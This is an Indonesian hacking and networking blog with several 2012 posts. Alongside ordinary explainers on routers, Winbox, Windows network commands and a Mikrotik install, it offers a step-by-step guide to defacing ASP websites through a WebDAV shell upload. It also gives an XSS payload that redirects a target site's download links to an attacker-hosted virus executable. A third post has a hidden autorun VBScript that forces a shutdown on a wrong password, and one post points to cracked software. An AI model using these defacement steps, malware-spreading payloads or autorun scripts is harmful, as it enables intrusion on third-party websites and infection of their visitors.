Deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shellnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP.
Nih ku kasih tutor dikit mengenai aplikasi ini :
1. Jalankan software nya..

2. Pilih WebDav >> ASP Shell Maker

3. Terus Klik Add Site >> Masukkan Website Target

4. Bila Berhasil akan ada penampakan seperti ini:

5. Terus hasilnya copas pada address bar.. Maka akan ada tampilan seperti ini..

6.Cari file Index atau apa saja lah yang bisa merubah tampilan website nya, edit / upload file tersebut dengan script halaman deface. Contohnya seperti ini:

Ok.. Mungkin ini dulu yang sedikit bisa saya sharing untuk sobat semua…. Untuk selanjutnya silahkan berkreasi…..
Semoga bermanfaat….
Salam Hacking Crew B.J.M

Jumat, 03 Agustus 2012

0 Cara Monitoring Jaringan


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
apa kabar semua'...? kembali lagi dengan saya nea calon hacking he'... kali ini saya ingin membahas tentang cara monitoring jaringan ... gimana sih ea'... mari kita simak yang berikut ini>>>
IPConfig
Command ini digunakan untuk mendapatkan profil konfigurasi network sebuah komputer. IPconfig menunjukkan semua tentang IP sebuah komputer diantaranya IP Address, subnet mask, default gateway, hostname, DNS server, routing info dan network adapter info. Perintah ini ini penting untuk seseorang mengetahui konfigurasi host sebelum membuat analisis jaringan selanjutnya. Contoh penggunaannya adalah:
c:\>ipconfig atau c:\>ipconfig /all.
Ping
Ping digunakan untuk menguji kemampuan sebuah host berkomunikasi atau mengirim datagram ke luar. Command ping ini bertindak dengan mengirim ICMP echo request. Perintah dari ping ini akan nenunjukkan jumlah datagaram yang hilang sewaktu berkomunikasi dan time to live (TTL). Perintah ini sangat baik digunakan untuk trouble shooting jaringan, misalnya waktu yang sedikit berarti trafik kita bagus.
Contoh penggunaan ping :
c:\> ping localhost atau 127.0.0.1 (untuk menguji konfigurasi network host)
c:\> ping 202.150.226.1 (menguji hubungan dari localhost ke host luar)
c:\> ping www.yahoo.com (menguji hubungan localhost ke host yahoo)
c:\> ping 202.150.226.1 -a (mendapatkan domain name host luar berdasarkan IP Address)
c:\> ping 202.150.226.1 -t (ping terus menerus, menghentikanya dengan Ctrl-C)
c:\> ping 202.150.226.1 -n 10 (ping host sebanyak 10 kali – n=number)
c:\> ping 202.150.226.1 -l 1000 (ping host dengan data sebanyak 1000 bytes)
TraceRoute
Command ini digunakan untuk mendapatkan trafik data yang diambil oleh datagram yang dikeluarkan oleh localhost ke sumbernya. Ini biasanya digunakan untuk mendapatkan data tentang keadaan trafik dalam sebuah jaringan untuk menguji kehandalan dan trouble shooting. Ia akan menunjukkan ke semua router serta IP address mereka dan waktu yang diambil untuk ke sana hingga ke sumber host. Contoh penggunaanya adalah:
c:\> traceroute www.yahoo.com
c:\> traceroute 192.168.0.1
Route
Route digunakan untuk menambah, membuang atau menukar perintah routing table dalam sebuah host. Command ini biasanya ditujukan untuk host dalam sebuah jaringan yang mempunyai 2 atau lebih router. Route digunakan untuk menyusun trafik komunikasi host berdasarkan IP dan subnet serta router atau gateway. Contoh penggunaan route :
c:\> route print (untuk mendapatkan perintah sewaktu routing table)
c:\> route add (untuk menambah perintah routing)
c:\> route change (menukar perintah routing)
c:\> route delete (menghapus perintah routing)
Hostname
Command digunakan untuk mendapat nama komputer yang kita mau yang telah didaftarkan dalam network. Anda hanya perlu mengetik c:\> hostname pada command window dan nama komputer anda akan kelihatan.
Netstat
Netstat digunakan untuk mendapatkan statistik yang berkaitan dengan IP, TCP, UDP dan ICMP protokol. Statistik ini menunjukkan perintah secara numerical seperti jumlah datagram yang dikirim, diterima dan kesalahan2 yang terdapat dalam pengiriman/penerimaan datagram.
Contoh penggunaan netstat :
netstat -s (menunjukkan statistic berdasarkan protokol serta kesalahan yang berlaku)
netstat -e (menunjukkan statistik ethernet)
netstat -r (menunjukkan statistik sama seperti route print dengan tambahan hubungan yang aktif. )
netstat -a (menunjukkan ke semua hubungan aktif dan yang menunggu untuk membuat hubungan.Penting untuk mengetahui kalau ada seseorang yang mencoba masuk ke komputer anda atau sebaliknya anda mencoba masuk ke komputer orang. Silahkan dipake kalau ada yang mencurigakan mengenai hubungan internet anda atau memang anda seorang yang paranoid)
netstat -a -n (menunjukkan ke semua hubungan aktif)
netstat -a -p TCP (menunjukkan hubungan aktif TCP)
netstat -a -p UDP (menunjukkan hubungan aktif UDP)
Net use\view
Command ini digunakan untuk memeriksa hubungan NetBios antar komputer. NetBios menggunakan Universal Naming Convention (UNC) untuk mengenali nama sebuah komputer dan aksess ke sumber share resources. Penggunaan command net ini penting dalam komputer jaringan untuk membuat hubungan terutama untuk sistem operasi windows. Ini akan membantu anda melihat, menyambung dan memutuskan sharing antara komputer yang menggunakan Server Message Block (SMB). SMB adalah sejenis Application Layer dalam windows yang mengijinkan komputer sharing directory dengan komputer lain dalam jaringan.
Anda perlu berhati-hati dengan command ini. Seseorang dapat saja memutuskan/meremote koneksi ke komputer anda tanpa anda sadari dari jarak jauh ke dalam direktori hard disk anda. Apalagi kalau windows anda tidak dikasih proteksi direktori (password protected directory sharing). Untuk membuat koneksi ke sebuah directory komputer pada jarak jauh, anda boleh mengikuti panduan di bawah:
c:\> net view \\202.150.226.124
Command ini digunakan untuk mendapatkan perintah ke directory yang di-share oleh komputer target.Command ini juga boleh digunakan untuk menguji sebuah komputer apakah mendukung fungsi NetBios. Anda juga boleh menggunakan program seperti RedButton untuk mendapatkan perintah directory sharing sebuah komputer.
c:\> net use X:\\ 202.150.226.124/$C
Setelah mendapat perintah directory yang di-share yaitu C$, anda boleh membuat hubungan ke directory target. Hubungan itu akan ditandai sebagai directory X pada komputer anda.Ini hanyalah sekedar contoh saja dengan asumsi directory komputer target tidak di password. Seandainya ia memerlukan password dan anda tahu passwordnya gunakan command di bawah.
c:\> net use X: \\202.10.10.188/C$ user:XXXXX password:XXXXX
Seandainya anda tidak tahu password komputer target ?????. hehehehehe anda perlu menggunakan tehnik2 kelas tinggi lagi dan anda harus gigit jempol kaki karena dengan sangat terpaksa saya ngga mau beritau.
NBTstat
NBTStat (NetBios over TCP/IP statistics) digunakan untuk mendapatkan statistik tentang NetBios name table komputer anda ataupun komputer lain dalam jaringan. Berikut adalah contoh penggunaanya :
nbtstat -r (digunakan untuk membersihkan dan memasukkan perintah NetBios ke dalam LMHostfile)
nbtstat -n (menunjukkan nama2 dan servis yang didaftarkan dalam sebuah local komputer)
nbtstat -c (menunjukkan isi dari cache name NetBios komputer lain yang baru membuat hubungan pada komputer local)
nbtstat -R (membersihkan dan preload NBT Remote cache name table)
nbtstat -A 10.100.206.2 (menunjukkan name table termasuk physical address komputer lain berdasarkan IP addressnya)
nbtstat -a NBTname (menunjukkan name table termasuk physical address komputer lain berdasarkan nama NetBios komputer yang bersangkutan)
nbtstat -S IP Address (menunjukkan NetBios connection table komputer lain berdasarkan IP)
nbtstat -s NBT Name (sama seperti diatas tetapi menggunakan NetBios name)

Kamis, 02 Agustus 2012

0 Pengertian Dan Fungsi Router


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Router berfungsi sebagai penghubung antar dua atau lebih jaringan untuk meneruskan data dari satu jaringan ke jaringan lainnya. Router berbeda dengan switch. Switch merupakan penghubung beberapa alat untuk membentuk suatu Local Area Network (LAN).


Analogi Router dan Switch

Sebagai ilustrasi perbedaan fungsi dari router dan switch adalah switch merupakan suatu jalanan, dan router merupakan penghubung antar jalan. Masing-masing rumah berada pada jalan yang memiliki alamat dalam suatu urutan tertentu. Dengan cara yang sama, switch menghubungkan berbagai macam alat, dimana masing-masing alat memiliki alamat IP sendiri pada sebuah LAN.

Router sangat banyak digunakan dalam jaringan berbasis teknologi protokol TCP/IP, dan router jenis itu disebut juga dengan IP Router. Selain IP Router, ada lagi AppleTalk Router, dan masih ada beberapa jenis router lainnya. Internet merupakan contoh utama dari sebuah jaringan yang memiliki banyak router IP. Router dapat digunakan untuk menghubungkan banyak jaringan kecil ke sebuah jaringan yang lebih besar, yang disebut dengan internetwork, atau untuk membagi sebuah jaringan besar ke dalam beberapa subnetwork untuk meningkatkan kinerja dan juga mempermudah manajemennya. Router juga kadang digunakan untuk mengoneksikan dua buah jaringan yang menggunakan media yang berbeda (seperti halnya router wireless yang pada umumnya selain ia dapat menghubungkan komputer dengan menggunakan radio, ia juga mendukung penghubungan komputer dengan kabel UTP), atau berbeda arsitektur jaringan, seperti halnya dari Ethernet ke Token Ring.

Router juga dapat digunakan untuk menghubungkan LAN ke sebuah layanan telekomunikasi seperti halnya telekomunikasi leased line atau Digital Subscriber Line (DSL). Router yang digunakan untuk menghubungkan LAN ke sebuah koneksi leased line seperti T1, atau T3, sering disebut sebagai access server. Sementara itu, router yang digunakan untuk menghubungkan jaringan lokal ke sebuah koneksi DSL disebut juga dengan DSL router. Router-router jenis tersebut umumnya memiliki fungsi firewall untuk melakukan penapisan paket berdasarkan alamat sumber dan alamat tujuan paket tersebut, meski beberapa router tidak memilikinya. Router yang memiliki fitur penapisan paket disebut juga dengan packet-filtering router. Router umumnya memblokir lalu lintas data yang dipancarkan secara broadcast sehingga dapat mencegah adanya broadcast storm yang mampu memperlambat kinerja jaringan.

0 Pengertian Dan Fungsi Winbox


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Pengertian dan Fungsi  Winbox, Sebelumnya kita sudah belajara tentang bagaimana cara install mikrotik. sekarang kita pelajari tentang Winbox, karena winbox sangat erat hubungannya dengan mikrotik.
Pengertin Winbox.
Winbox adalah sebuah utility yang digunakan untuk melakukan remote ke server mikrotik kita dalam mode GUI. Jika untuk mengkonfigurasi mikrotik dalam text mode melalui PC itu sendiri, maka untuk mode GUI yang menggunakan winbox ini kita mengkonfigurasi mikrotik melalui komputer client.
Mengkonfigurasi mikrotik melaui winbox ini lebih banyak digunakan karena selain penggunaannya yang mudah kita juga tidak harus menghapal perintah-perintah console. Untuk mendapatkan winbox anda bisa mendownloadnya atau bisa juga mendapatkan dimikrotik anda.Caranya buka browser anda, tuliskan di address bar http://ipaddressrouter/winbox/winbox.exe atau anda bisa mendownloadnya disini.
Fungsi Winbox
Fungsi utama winbox adalah untuk setting yang ada pada mikrotik,  berarti tugas utama windox adalah untuk menyetting atau mengatur mikrotik dengan GUI, atau tampilan dekstop :)
fungsi winbox lebih rinci adalah
1. Setting mikrotik routher
2. untuk setting bandwite jaringan internet
3. untuk setting blokir sebuah situs
4. dan masih banyak yg lainnya..
kalau teman-teman ada tambahan monggo… :)
screenshoot winbox seperti ini.
Screenshot Winbox

pencarian lain:

,winbox adalah,pengertian winbox,fungsi winbox,kegunaan winbox,pengertian dan fungsi address bar,winbox,cara instal winbox,guna winbox,definisi winbox,pengertian winbox mikrotik,tentang winbox,FUNGSI DARI WINBOX,fungsi software winbox,fungsi dan kegunaan winbox,kegunaan software winbox,fungsi winbox mikrotik,pengertian win box,apa fungsi winbox,winbox definisi,fungsi perintah mikrotik,cara menginstall winbox,apa gunanya comment di mikrotik,fungsi mikrotik,penggunaan winbox,pengertin winbox winbox adalah sebuah utility yang digunakan untuk melakukan remote ke server mikrotik kita dalam mode gui jika untuk mengkonfigurasi mikrotik dalam text mode melalui pc itu sendiri maka untuk mode gui yang menggunakan winbox ini kita meng,arti fungsi dalam winbox mikrotik,cara instal mikrotic win box,pengertian winbox adalah,winbox loader adalah,pengertian winbok,pengertian winboc dan console,fungs fungsi pada winbox,penjelasan microtic,penjelasan PROGRAM WINBOX,penjelasan tentang winbox,winbox fungsi,apa kegunaan winbox,apakah fungsi winbox,win box itu apa??,win box guna nya buat apa ?,video demo pt mentari internasional jombang di youtube,pengertian winbox pdf,pngertian winbox,perintah dan fungsi microtic,pengertian wibox,pengertian mikrotik winbox,pengertian gui dan kegunaannya pdf,kegunaan GUI,kegunaan address bar,jaknote(Visited 4,531 times, 10 visits today) Tags:

0 Cara Memasang Password Di Flasdisk


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Banyak aplikasi yang dapat memberi manfaat untuk mengunci flashdisk atau memberi password otomatis ke flashdisk. Tetapi beda lagi dengan postingan kali ini . sebelumnya cara ini saya dapatkan dari seorang programmer yang hebat http://inside-and.blogspot.com
Cara ini akan otomatis meminta password ketika flashdisk dimasukan ke PC dan jika password salah, maka komputer akan shutdown secara otomatis.
Langsung saja .

1. Buka Notepad
( Caranya : Start>>All Programs>>Accessories>>Notepad atau masuk di RUN lalu ketik notepaddan Enter) lalu copy paste script kode dibawah ini ke notepad

on error goto 0

dim s,quest,sd,m,winpath,fs
set sd=createobject("Wscript.shell")
set fs=createobject("Scripting.FileSystemObject")
set winpath=fs.getspecialfolder(0)
set s=wscript.createobject("wscript.shell")
do while quest=""
quest=inputbox("Masukkan PASSWORD, Jika anda salah dalam memasukkan password, maka komputer ini akan ShutDown!!!","http://pedasmaniscinta.blogspot.com")
if quest="" then
m=MsgBox("Maaf anda belum memasukkan password...!", 0+0+48, "http://pedasmaniscinta.blogspot.com")
end if
loop
if quest="TULIS PASSWORD DISINI" then
s.run "shutdown -a"
sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
else
s.run "shutdown -s -t 0"
end if

TULIS PASSWORD DISINI ganti sesuai keinginan anda, itu adalah sebagai tempat password anda. Pemakaian huruf kapital sangat berpengaruh. saya sarankan memakai angka yang sudah diingat di luar kepala.
lalu save as dengan nama dengan "passwordlock.vbs" tanpa tanda kutip, sebelum di save as pastikan pilih all files.

2. setelah selesai diatas.
lalu buka Notepad lagi, untuk pengaturan otomatis setelah flashdisk dimasukan di PC.
copy paste script kode dibawah ini ke notepad.

[Autorun]
shellexecute=wscript.exe passwordlock.vbs
action=FLASHDISK TELAH DILENGKAPI CODE

anda dapat merubah kata "FLASHDISK TELAH DILENGKAPI CODE" sesuai kata-kata mutiara keinginan anda sendiri.
setelah itu lakukan penyimpanan seperti file yang pertama, tetapi pada bagian File name tulislah "autorun.inf" tanpa tanda kutip, sebelum di save as pastikan pilih all files.

Kemudian pindahkan kedua file yang telah anda buat tadi (autorun.inf dan passwordlock.vbs) ke dalam flashdisk anda.

langkah terakhir silahkan anda hidden autorun.inf dan passwordlock.vbs yang telah dibuat tadi.
Cara hidden : klik kanan pada masing- masing autorun.inf dan passwordlock.vbs lalu pilih properties centang kotak yang ada di tanda hidden. selesai . . . .

WARNING>>>
diharapkan anda tidak lupa dengan password yang anda masukan {karna saya tidak bertangung jawab atas apa yang dilakukan anda} 
Good Luck'..

0 XXS Untuk Penyebaran Virus


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Sahabat semuanya, apa kabar?
Saatnya beraksi agar kalian bisa mengetahui, pake tools apa sih para virus creator untuk menyebarkan virusnya?
Semua pasti bertanya-tanya, para virus creator menggunakan apa sih untuk menyebarkan virus? Berikut ini adalah beberapa cara bagaimana virus creator menyebarkan virusnya:
1. Email
2. Phising
3. USB
4. Hacking
5. Cracking

Kita memilih dengan cara Hacking & Cracking yaitu dengan menggunakan XSS!
Skenarionya adalah:
1. Kita memiliki situs virus / menempatkan sebuah virus di situs, misal: http://www.situssaya.com/virussaya.exe
2. Kita memiliki target yang memiliki vulnerability untuk CSS, misalkan: http://www.target.com/index.php?download=<script>alert(“BinusHacker Was Here”)</script> apabila muncul alert box, berarti website tersebut memiliki vulnerability.
Bagi yang menggunakan Mozilla Firefox, silakan download tools berikut untuk melakukan check XSS:
Download XSS Tools
Nah, langsung saja pada praktek!
Ubah saja yang ada di web target menjadi seperti berikut untuk menyebarkan virus:
http://www.target.com/index.php?download=<script>window.onload = function() {var AllLinks=document.getElementsByTagName(“a”); AllLinks[0].href = “http://www.situssaya.com/virussaya.exe”; }</script>
Kesimpulan:
Setiap ada user yang melakukan download di website tersebut, yang akan terdownload adalah virus yang kita miliki.
Gunakan imajinasi anda, agar bisa lebih berkreasi kembali.
Berikut adalah contoh, penjelesan dan video mengenai XSS Persistence Demo
http://www.youtube.com/watch?v=V79Dp7i4LRM&feature=player_embedded#! 
Semoga artikel di atas bermanfaat & selamat berkreasi di tahun baru :)

Rabu, 01 Agustus 2012

0 Langka - Langkah Menginstall Mikrotik


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Langkah awa untuk menginstall router ini yaitu dengan tersenyum tertawa - tawa becanda dengan rekan-rakan berguyon ria hingga pada akhirnya teriak dengan kencang sebanyak 100 kali " ini sangat mudah".. heheh ea mari kita lakukan >>
Pertama kali yang harus di siapkan adalah komputer Server dengan Spesifikasi sbb;
  • CPU dan motherboard P4 atau AMD.
  • RAM minimal 256 ya lebih besar pastinya lebih bagus untuk web proxy nantinya.
  • Hard disk Minimal 20 (lebih besar lebih mantap)
  • Ethernet Card (disarankan card dengan chipset realtek) 2 buah
Bila Router digunakan untuk workstation dalam jumlah banyak disarankan untuk upgrade Hardware diatas.
Untuk Software MIKROTIK yang digunakan, Mikrotik 2.9.27 karena sudah banyak link download yang telah ada cracknya.
Oke langsung aja kita mulai instalasi mikrotik
  1. Pastikan First Boot adalah CDRoom
  2. Masukkan CD Instalasi Mikrotik, tunggu beberapa saat hingga tampil tampilan seperti gambar dibwah ini :
  3. 12 Instalasi Mikrotik
  4. Tekan Tombol ”a” (tanpa kutip dua) bila ingin menginstal seluruh paket, tekan tombol spasi (space) untuk memilih paket yang diinstal. maka tekan saja “a” untuk menginstal seluruh paket.
  5. 22 Instalasi Mikrotik
  6. Bila telah selesai memilih tekan tombol ”i”, maka akan muncul pertanyaan ”Do You Want to Keep Old Configuration?” seperti pada gambar dibawah ini :
  7. Tekan Tombol ”Y” bila anda ingin menggunakan Konfigurasi Mikrotik yang lama, Tekan Tombol ”N” bila anda ingin mengosongkan Konfigurasi.
  8. Kemudian akan muncul pertanyaan ”Seluruh data akan dihapus! (system melakukan Partisi Ulang pada Hard Disk) seperti pada gambar dibawah ini :
  9. 31 Instalasi Mikrotik
  10. Maka anda harus menekan tombol y, dan proses Format dan Partisi Hard Disk akan berjalan.
  11. Setelah proses format dan partisi selesai, maka akan dilanjutkan dengan proses instalasi paket – paket yang telah dipilih tadi.
  12. Tunggu beberapa saat hingga tampil pesan ” Software instaled” dan  “Press enter to reboot”  Maka tekan Enter untuk reboot
  13. 41 Instalasi Mikrotik
  14. Proses instalasi selesai, Tekan Enter untuk Restart / Reboot dan pastikan pada saat restart Cd istalasi dikeluarkan, karena apabila tidak dikeluarkan maka akan melakukan proses instalasi kembali.
  15. Setelah reboot maka akan tampil proses loading system, dan system mikrotik menanyakan apakah anda ingin melakukan pengecekan harddisk? Tekan ”y” untuk pengecekan dan tekan ”n” untuk mengabaikan. Sebaiknya sih tekan ”y” siapa tahu ada paket yang error atau harddisk yang error.
  16. Bila tidak terdapat error maka akan tampil jendela Login System Mikrotik, isi dengan Mikrotik Login : admin dan Password : kosongin aja ( langsung tekan enter )
  17. 51 Instalasi Mikrotik
  18. Jika Login anda berhasil maka akan muncul tampilan sebagai berikut :
  19. 61 Instalasi Mikrotik
Konfigurasi Mikrotik sebagai Gateway
1. Periksa apakah Ethernet card sudah terinstal dengan perintah :
1
interface print
2. Pengisian IP address pada tiap interface (ether)
1
2
3
Ip address add address=192.168.1.2/24 interface=ether1

Ip address add address=192.168.1.254/24 interface=ether2
3. Pengisian IP Gateway
1
Ip route add gateway=192.168.1.1
4. Pengisian IP DNS (diisi sesuai dengan ip dns dari ISP) disini saya contohkan menggunakan speedy
1
2
3
Ip dns set primary-dns=203.130.206.250 allow-remote-request=yes

Ip dns set secondary-dns=202.134.0.155 allow-remote-request=yes
5. Setting Firewall Nat
1
ip firewall nat add chain=srcnat action=masquerade out-interface=ether1
6. Membuat IP Address Pool
1
ip pool add name=dhcp-pool ranges=192.168.1.3-192.168.1.253
untuk lebih jelasnya dapat didownload tutorial dalam bentuk word. tutorial mikrotik
dan, kalau link Mikrotiknya ada disini